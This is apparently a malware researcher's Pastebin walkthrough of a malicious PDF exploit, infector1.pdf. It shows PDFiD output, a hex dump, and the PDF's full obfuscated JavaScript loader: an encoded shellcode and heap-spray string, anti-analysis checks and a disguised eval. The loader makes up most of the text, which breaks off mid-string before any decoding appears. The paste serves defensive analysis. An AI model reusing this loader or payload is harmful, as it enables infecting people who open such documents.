SHARE
TWEET

Guide Step by Step of Analysis Malicious PDF: infector1.pdf

MalwareMustDie Nov 26th, 2012 29,658 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //=========================================
  2. // #MalwareMustDie | @unixfreaxjp ~]$ date
  3. // Mon Nov 26 16:35:46 JST 2012
  4. //
  5. // Guide Step by Step  of Analysis Malicious PDF : infector1.pdf
  6. // With the decoding guide step by steps
  7. // As per found in Case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
  8. //
  9. // VT: https://www.virustotal.com/file/b771f74ff9c17682f15485bc11a7dd379cfea3b8b1f48b1391a5e53b7e693c2c/analysis/
  10. // *) the materials contains dangerous code, yet we hexed it, so it cannot be used as per it is.
  11. //=========================================
  12.  
  13. // I confirmed PDF file as per my FreeBSD command below:
  14. $ PDFiD0.0.11 ./infector1.pdf
  15.  PDF Header: %PDF-1.4
  16.  obj                   30
  17.  endobj                30
  18.  stream                 5
  19.  endstream              5
  20.  xref                   2
  21.  trailer                2
  22.  startxref              2
  23.  /Page                  1
  24.  /Encrypt               0
  25.  /ObjStm                0
  26.  /JS                    2
  27.  /JavaScript            3
  28.  /AA                    1
  29.  /OpenAction            0
  30.  /AcroForm              1
  31.  /JBIG2Decode           0
  32.  /RichMedia             0
  33.  /Launch                0
  34.  /Colors > 2^24         0
  35.  %%EOF                  2
  36.  After last %%EOF       0
  37.  D:20120917233320+04'00  /CreationDate
  38. D:20121029234204+03'00  /ModDate
  39.  Total entropy:           5.796856 (     27836 bytes)
  40.  Entropy inside streams:  5.910138 (      6474 bytes)
  41.  Entropy outside streams: 5.212578 (     21362 bytes)
  42.  
  43. 0000   25 50 44 46 2D 31 2E 34 0D 25 E2 E3 CF D3 0D 0A    %PDF-1.4.%......
  44. 0010   31 34 20 30 20 6F 62 6A 0D 3C 3C 2F 4C 69 6E 65    14 0 obj.<</Line
  45. 0020   61 72 69 7A 65 64 20 31 2F 4C 20 31 32 32 38 39    arized 1/L 12289
  46. 0030   2F 4F 20 32 30 2F 45 20 36 31 34 37 2F 4E 20 31    /O 20/E 6147/N 1
  47. 0040   2F 54 20 31 31 38 38 39 2F 48 20 5B 20 36 33 36    /T 11889/H [ 636
  48. 0050   20 31 37 34 5D 3E 3E 0D 65 6E 64 6F 62 6A 0D 20     174]>>.endobj.
  49. 0060   20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  50. 0070   20 20 0D 0A 78 72 65 66 0D 0A 31 34 20 31 37 0D      ..xref..14 17.
  51. 0080   0A 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30    .0000000016 0000
  52.  
  53. =============================
  54. PREPARING FOR DECCDING PROCESS
  55. ============================
  56. //in the Hlen: 0x3D05 we can see the malicious JS code as per below;
  57. <<
  58.         /JS(
  59.         a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1n1l1j39163o1n361n1m163o1n371n1m163o1n1i1n1q163o1n391o1l163o1j381o1j163o1o1m1o1j163o1k1p1k34163o1k1p1k1h163o1j391k1h163o1n391n1n163o1o1m1o1j163o1j391n37163o1n1q1n36163o1n351n38163o1j391o1k163o1n391n1k163o1o1m1n36163o1n381n37163o1o1h1j38163o1o1h1n1p163o1n1k1k39163o1n371o1q163o1o1m1o1o163o1k1k1k37163o1k341k1h163o1n381k1i163o1k1i1k34163o1k341n1q163o1n1q1k1i163o1k1k1k34163o1j1n1k1k163o1n1q1o1l163o1o1h1n35163o1o1q1n1q163o1n1n1n35163o1k1j1k37163o1k341o1n163o1n351k1i163o1k1i1k34163o1k341n37163o1k1j1k1k163o1k1k1k34163o1k341k1k163o1n351k1i163o1k1i1k34163o1k341n35163o1k1i1k1k163o1k1i1k34163o1k341n34163o1n391k1i163o1o341j1n163o1n391n35163o1k371o1m163o1n1p1k1i163o1n1p1j1n163o1n1m1o1q163o1n391n1l163o1k371n1i163o1o1h1n1n163o1n371o1l163o1j1n1n36163o1n1q1n1p163o1n1l1n1k163o1k371n35163o1n371n1p163o1n381o1q163o1n1i1n35163o1o1o1n34163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3q3b3c3f38193l341f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1t3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3k3s1g1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1l1l1q1m1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1r3i3p383l393f3i3q411'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3q3b3c3f3819353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1c1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e41393c3f3f353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1e3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1c3m3j3l343s1t1h3r1l1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1h3r1l1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h193n2n2f3b2g35293q1'+parseInt(app.beep(0)).toString().substring(1,2)+'4141342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191'+parseInt(app.beep(0)).toString().substring(1,2)+'1f363b343l233n191h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c3919342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113f3p1u342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+parseInt(app.beep(0)).toString().substring(1,2)+'404019193m3p1u1u1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1u1p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c39193f3p1u1u1o1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c391919193m3p1u1u1n1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193m3p1u1u1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1o1f1i1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c3919193f3p201u1q1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1q1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p201u1p1f1i1k1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1p1f1i1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u393o3h363n3c3i3h1134191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'413p343l113b1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193c1t1p1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u361u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11381u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1u1h3r1p1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u362t39301u371c384134191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s34191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+parseInt(app.beep(0)).toString().substring(1,2)+'4136343n363b19381'+parseInt(app.beep(0)).toString().substring(1,2)+'3u4134191'+parseInt(app.beep(0)).toString().substring(1,2)+'4141';
  60.         s='';
  61.         for(i=0;i<a.length;i+=2){
  62.                 var jj = 0;
  63.                 try{loadXML({});}catch(e){jj=1}
  64.                 if (jj==1) s+=String.fromCharCode(parseInt(a[i]+a[i+1],31));
  65.         }
  66.         e=this;
  67.         ev=/**/'eva'/**/;
  68.         l='l';
  69.         e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
  70.         e(s);
  71.         )/S/JavaScript
  72. >>
  73.  
  74.  
  75. //
  76. // Just strips the PDF tags and bame the JS code looks readable as follows:
  77. //
  78.  
  79.  a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1n1l1j39163o1n361n1m163o1n371n1m163o1n1i1n1q163o1n391o1l163o1j381o1j163o1o1m1o1j163o1k1p1k34163o1k1p1k1h163o1j391k1h163o1n391n1n163o1o1m1o1j163o1j391n37163o1n1q1n36163o1n351n38163o1j391o1k163o1n391n1k163o1o1m1n36163o1n381n37163o1o1h1j38163o1o1h1n1p163o1n1k1k39163o1n371o1q163o1o1m1o1o163o1k1k1k37163o1k341k1h163o1n381k1i163o1k1i1k34163o1k341n1q163o1n1q1k1i163o1k1k1k34163o1j1n1k1k163o1n1q1o1l163o1o1h1n35163o1o1q1n1q163o1n1n1n35163o1k1j1k37163o1k341o1n163o1n351k1i163o1k1i1k34163o1k341n37163o1k1j1k1k163o1k1k1k34163o1k341k1k163o1n351k1i163o1k1i1k34163o1k341n35163o1k1i1k1k163o1k1i1k34163o1k341n34163o1n391k1i163o1o341j1n163o1n391n35163o1k371o1m163o1n1p1k1i163o1n1p1j1n163o1n1m1o1q163o1n391n1l163o1k371n1i163o1o1h1n1n163o1n371o1l163o1j1n1n36163o1n1q1n1p163o1n1l1n1k163o1k371n35163o1n371n1p163o1n381o1q163o1n1i1n35163o1o1o1n34163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3q3b3c3f38193l341f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1t3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3k3s1g1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1l1l1q1m1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1r3i3p383l393f3i3q411'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1